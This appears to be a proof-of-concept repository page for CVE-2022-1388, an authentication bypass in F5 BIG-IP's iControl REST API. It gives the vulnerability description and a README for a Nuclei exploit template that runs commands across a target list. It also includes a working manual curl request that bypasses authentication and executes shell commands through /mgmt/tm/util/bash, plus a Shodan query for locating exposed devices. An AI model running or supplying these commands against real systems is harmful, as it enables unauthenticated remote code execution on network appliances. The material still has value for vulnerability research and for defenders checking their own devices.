CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source

Associated Vulnerability

Description

CVE-2022-1388 is an authentication bypass vulnerability in the REST      component of BIG-IP’s iControl API that was assigned a CVSSv3      score of 9.8. The iControl REST API is used for the management and      configuration of BIG-IP devices. CVE-2022-1388 could be exploited      by an unauthenticated attacker with network access to the management      port or self IP addresses of devices that use BIG-IP. Exploitation would      allow the attacker to execute arbitrary system commands, create and      delete files and disable services.

Readme

# Nuclei Template Exploit F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter
CVE-2022-1388 is an authentication bypass vulnerability in the REST 
component of BIG-IP’s iControl API that was assigned a CVSSv3 
score of 9.8. The iControl REST API is used for the management and 
configuration of BIG-IP devices. CVE-2022-1388 could be exploited 
by an unauthenticated attacker with network access to the management 
port or self IP addresses of devices that use BIG-IP. Exploitation would 
allow the attacker to execute arbitrary system commands, create and 
delete files and disable services.

## This template use token-spray / nuclei's CLI variable 
This nuclei-template accepts shell parameter for exploitation.
We wanted to test tokens obtained from another workflow or a manual search, so we used nuclei's CLI variable feature to dynamically feed a single token value or list of tokens into these templates at run time

> `-V, -var value              custom vars in var=value format`

```bash
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a
```
![Captura de tela de 2022-05-10 01-28-12](https://user-images.githubusercontent.com/17049332/167542872-e92763aa-1a46-48f5-9acd-54b150b37c50.png)


## POC Manual
```bash
curl -su admin \ 
-H "Host: localhost:8100" \ 
-H "Content-Type: application/json" \ 
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \ 
-H "Authorization: Basic YWRtaW46" \
 http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'
```

### Additional Details
- https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

### References
- https://blog.projectdiscovery.io/nuclei-v2-5-release/
- https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
- https://github.com/alt3kx/CVE-2022-1388_PoC
- https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
- https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
- https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
- https://github.com/tenable/audit_files/tree/master/cve-2022-1388
- https://support.f5.com/csp/article/K23605346
- https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
- https://twitter.com/1ZRR4H/status/1522165718975922178
- https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ipaml

File Snapshot

 [4.0K]  /data/pocs/f45853eddb7f0db2ec675c3914c79d17535c846e
├── [2.2K]  exploit-CVE-2022-1388.yaml
└── [2.6K]  README.md

0 directories, 2 files

Remarks